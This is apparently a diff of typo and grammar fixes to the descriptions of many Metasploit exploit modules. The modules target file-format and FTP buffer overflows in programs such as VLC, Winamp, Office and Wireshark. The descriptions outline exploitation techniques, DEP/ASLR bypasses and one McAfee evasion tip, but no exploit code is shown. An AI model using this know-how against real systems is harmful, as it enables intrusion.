This module embeds an exploit into an ucompressed map file (.h3m) for
This module embeds an exploit into an uncompressed map file (.h3m) for
Heroes of Might and Magic III. Once the map is started in-game, a
buffer overflow occuring when loading object sprite names leads to
buffer overflow occurring when loading object sprite names leads to
shellcode execution.
},
'License' => MSF_LICENSE,

View File

@ -32,9 +32,9 @@ class MetasploitModule < Msf::Exploit::Remote
saved RETURN address at offset 0x6c is overwritten by the data written past the buffer.
To ensure we can perform arbitrary code execution we must we provide a valid pointer at
0x74 which is used as a argument for the called function at 0x675751ED as a id file
0x74 which is used as an argument for the called function at 0x675751ED as an id file
extension parameter. Once the caller regains control we will reach our RETURN. The Ret
instruction will be used to pop the overwritten saved return address which was currupted.
instruction will be used to pop the overwritten saved return address which was corrupted.
This exploit has been written to bypass 2 mitigations DEP and ASLR on a Windows platform.

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'IcoFX Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in version 2.1
of IcoFX. The vulnerability exists while parsing .ICO files, where an specially
of IcoFX. The vulnerability exists while parsing .ICO files, where a specially
crafted ICONDIR header providing an arbitrary long number of images in the file
can be used to trigger the overflow when reading the ICONDIRENTRY structures.
},

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack buffer overflow in versions v9.7
through v10.5 of IDEAL Administration and versions 4.5 and 4.51 of
IDEAL Migration. All versions are suspected to be vulnerable.
By creating a specially crafted ipj file, an an attacker may be able
By creating a specially crafted ipj file, an attacker may be able
to execute arbitrary code.
NOTE: IDEAL Administration 10.5 is compiled with /SafeSEH

View File

@ -18,8 +18,8 @@ class MetasploitModule < Msf::Exploit::Remote
The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails
to check the FileName argument, and passes it on to a ShellExecuteW() function,
therefore allows any malicious attacker to execute any process that's on the
local system. However, if the victim machine is connected to a remote share (
or something similiar), then it's also possible to execute arbitrary code.
local system. However, if the victim machine is connected to a remote share
(or something similar), then it's also possible to execute arbitrary code.
Please note that a custom template is required for the payload, because the
default Metasploit template is detectable by McAfee -- any Windows binary, such
as calc.exe or notepad.exe, should bypass McAfee fine.

View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow in Millenium MP3 Studio 2.0.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Millenium MP3 Studio.
PLS file within a browser, when the PLS extension is registered to Millenium MP3 Studio.
This functionality has not been tested in this module.
},
'License' => MSF_LICENSE,

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'MJM Core Player 2011 .s3m Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in MJM Core Player 2011
When opening a malicious s3m file in this applications, a stack buffer overflow can be
When opening a malicious s3m file in this application, a stack buffer overflow can be
triggered, resulting in arbitrary code execution.
This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.
},

View File

@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack-based buffer overflow found in the handling
of SAMI subtitles files in MPlayer SVN Versions before 33471. It currently
targets SMPlayer 0.6.8, which is distributed with a vulnerable version of mplayer.
targets SMPlayer 0.6.8, which is distributed with a vulnerable version of MPlayer.
The overflow is triggered when an unsuspecting victim opens a movie file first,
followed by loading the malicious SAMI subtitles file from the GUI. Or, it can also
be done from the console with the mplayer "-sub" option.
be done from the console with the MPlayer "-sub" option.
},
'License' => MSF_LICENSE,
'Author' => [

View File

@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote
structure from the file to calculate a pointer offset without doing proper
validation. Attacker supplied data is then used to calculate the location of an
object, and in turn a virtual function call. This results in arbitrary code
exection.
execution.
NOTE: On some versions of Office, the user will need to dismiss a warning dialog
prior to the payload executing.

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a vulnerability found in Excel 2002 of Microsoft Office XP.
By supplying a .xls file with a malformed OBJ (recType 0x5D) record an attacker
can get the control of the excution flow. This results aribrary code execution under
can get the control of the execution flow. This results in arbitrary code execution under
the context of the user.
},
'License' => MSF_LICENSE,

View File

@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a vulnerability found in Excel of Microsoft Office 2007.
By supplying a malformed .xlb file, an attacker can control the content (source)
of a memcpy routine, and the number of bytes to copy, therefore causing a stack-
based buffer overflow. This results aribrary code execution under the context of
user the user.
based buffer overflow. This results in arbitrary code execution under the context of
the user.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -12,7 +12,7 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Microsoft Visual Basic VBP Buffer Overflow',
'Description' => %q{
This module exploits a stack oveflow in Microsoft Visual
This module exploits a stack overflow in Microsoft Visual
Basic 6.0. When a specially crafted vbp file containing a long
reference line, an attacker may be able to execute arbitrary
code.

View File

@ -41,8 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a
drawing in Microsoft Office, and how it gets calculated with user-controlled inputs,
and stored in the EAX register. The 32-bit register will run out of storage space to
represent the large vlaue, which ends up being 0, but it still gets pushed as a
dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a
represent the large value, which ends up being 0, but it still gets pushed as a
dwBytes argument (size) for a HeapAlloc call. The HeapAlloc function will allocate a
chunk anyway with size 0, and the address of this chunk is used as the destination buffer
of a memcpy function, where the source buffer is the EXIF data (an extended image format
supported by TIFF), and is also user-controlled. A function pointer in the chunk returned

View File

@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Orbit Downloader URL Unicode Conversion Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in Orbit Downloader.
The vulnerability is due to Orbit converting an URL ascii string to unicode
in a insecure way with MultiByteToWideChar.
The vulnerability is due to Orbit converting a URL ascii string to unicode
in an insecure way with MultiByteToWideChar.
The vulnerability is exploited with a specially crafted metalink file that
should be opened with Orbit through the "File->Add Metalink..." option.
},

View File

@ -15,8 +15,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'PDF Shaper Buffer Overflow',
'Description' => %q{
PDF Shaper is prone to a security vulnerability when processing PDF files.
The vulnerability appear when we use Convert PDF to Image and use a specially
crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
The vulnerability appears when we use Convert PDF to Image and use a specially
crafted PDF file. This module has been tested successfully on Win XP, Win 7,
Win 8, Win 10.
},
'License' => MSF_LICENSE,

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Total Video Player 1.3.1 (Settings.ini) - SEH Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in Total Video Player 1.3.1. The vulnerability
occurs opening malformed Settings.ini file e.g."C:\Program Files\Total Video Player\".
occurs opening malformed Settings.ini file e.g. "C:\Program Files\Total Video Player\".
This module has been tested successfully on Windows WinXp-Sp3-EN, Windows 7, and Windows 8.
},
'License' => MSF_LICENSE,

View File

@ -21,7 +21,7 @@ class MetasploitModule < Msf::Exploit::Remote
execution. A patch is available at visiwave.com; the fix is done by XORing the return value as
null if no match is found, and then it is validated before use.
NOTE: During installation, the application will register two file handle's, VWS and VWR and allows a
NOTE: During installation, the application will register two file handles, VWS and VWR, which allows a
victim user to 'double click' the malicious VWR file and execute code. This module was also built
to bypass ASLR and DEP.
},

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'VideoLAN Client (VLC) Win32 smb:// URI Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Win32AddConnection
function of the VideoLAN VLC media player. Versions 0.9.9 throught 1.0.1 are
function of the VideoLAN VLC media player. Versions 0.9.9 through 1.0.1 are
reportedly affected.
This vulnerability is only present in Win32 builds of VLC.

View File

@ -12,8 +12,8 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'VUPlayer CUE Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in VUPlayer <= 2.49. When
the application is used to open a specially crafted cue file, an buffer is overwritten allowing
This module exploits a stack based overflow in VUPlayer <= 2.49. When
the application is used to open a specially crafted cue file, a buffer is overwritten allowing
for the execution of arbitrary code.
},
'License' => MSF_LICENSE,

View File

@ -15,9 +15,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used with in a insecure way with user controlled data.
where memmove is used in an insecure way with user controlled data.
To exploit the vulnerability the attacker must convince the attacker to install the
To exploit the vulnerability the attacker must convince the victim to install the
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
or generate a new skin using the crafted mcvcore.maki file. The module has been
tested successfully on Windows XP SP3 and Windows 7 SP1.

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Wireshark wiretap/mpeg.c Stack Buffer Overflow',
'Description' => %q{
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
by generating an malicious file.)
by generating a malicious file.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the PLS extention is registered to Zinf.
PLS file within a browser, when the PLS extension is registered to Zinf.
This functionality has not been tested in this module.
},
'License' => MSF_LICENSE,

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',
'Description' => %q{
This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially
crafted format string specifier as a username. The crafted username is sent to to the server to
crafted format string specifier as a username. The crafted username is sent to the server to
overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer
is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.
The SEH exit function is preferred so that the administrators are not left with an unhandled

View File

@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote
PASS command. This may allow a remote attacker to cause a buffer overflow,
resulting in a denial of service or allow the execution of arbitrary code.
FreeFTPd must have an account set to authorization anonymous user account.
freeFTPd must have an account set to authorization anonymous user account.
},
'License' => MSF_LICENSE,
'Author' =>

View File

@ -14,8 +14,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'FTPShell 5.1 Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in FTPShell 5.1. The overflow gets
triggered when the ftp clients tries to process an overly response to a PWD command.
This will overwrite the saved EIP and structured exception handler.
triggered when the ftp client tries to process an overly long response to a PWD
command. This will overwrite the saved EIP and structured exception handler.
},
'Author' =>
[

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'HTTPDX tolog() Function Format String Vulnerability',
'Description' => %q{
This module exploits a format string vulnerability in HTTPDX FTP server.
By sending an specially crafted FTP command containing format specifiers, an
By sending a specially crafted FTP command containing format specifiers, an
attacker can corrupt memory and execute arbitrary code.
By default logging is off for HTTP, but enabled for the 'moderator' user

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a buffer overflow vulnerability found in the PUT command of the
PCMAN FTP v2.0.7 Server. This requires authentication but by default anonymous
credientials are enabled.
credentials are enabled.
},
'Author' =>
[

View File

@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
vulnerability that is triggered when processing a sufficiently long
filename during a FTP LIST command resulting in overwriting the
exception handler. Social engineering of executing a specially crafted
ftp file by double click will result in connecting to our malcious
ftp file by double click will result in connecting to our malicious
server and perform arbitrary code execution which allows the attacker to
gain the same rights as the user running ScriptFTP. This vulnerability
affects versions 3.3 and earlier.

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Seagull FTP v3.3 Build 409 Stack Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the Seagull FTP client that gets
triggered when the ftp clients processes a response to a LIST command. If the
triggered when the ftp client processes a response to a LIST command. If the
response contains an overly long file/folder name, a buffer overflow occurs,
overwriting a structured exception handler.
},

View File

@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Vermillion FTP Daemon PORT Command Memory Corruption',
'Description' => %q{
This module exploits an out-of-bounds array access in the Arcane Software
Vermillion FTP server. By sending an specially crafted FTP PORT command,
Vermillion FTP server. By sending a specially crafted FTP PORT command,
an attacker can corrupt stack memory and execute arbitrary code.
This particular issue is caused by processing data bound by attacker
@ -23,7 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
Processing is done using a source ptr (p) and a destination pointer (q).
The vulnerable function walks the input string and continues while the
source byte is non-null. If a comma is encountered, the function increments
the the destination pointer. If an ascii digit [0-9] is encountered, the
the destination pointer. If an ascii digit [0-9] is encountered, the
following occurs:
*q = (*q * 10) + (*p - '0');

View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a stack buffer overflow in Xlink FTP Client 32
Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.
When a overly long FTP server response is recieved by a client,
When an overly long FTP server response is received by a client,
arbitrary code may be executed.
},
'Author' => [ 'MC' ],

View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Description' => %q{
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable
code is only accessible when clustering is configured. A request containing a
long JSESSION cookie value can lead to arbirtary code execution.
long JSESSION cookie value can lead to arbitrary code execution.
},
'Author' => 'pusscat',
'References' =>

Some files were not shown because too many files have changed in this diff Show More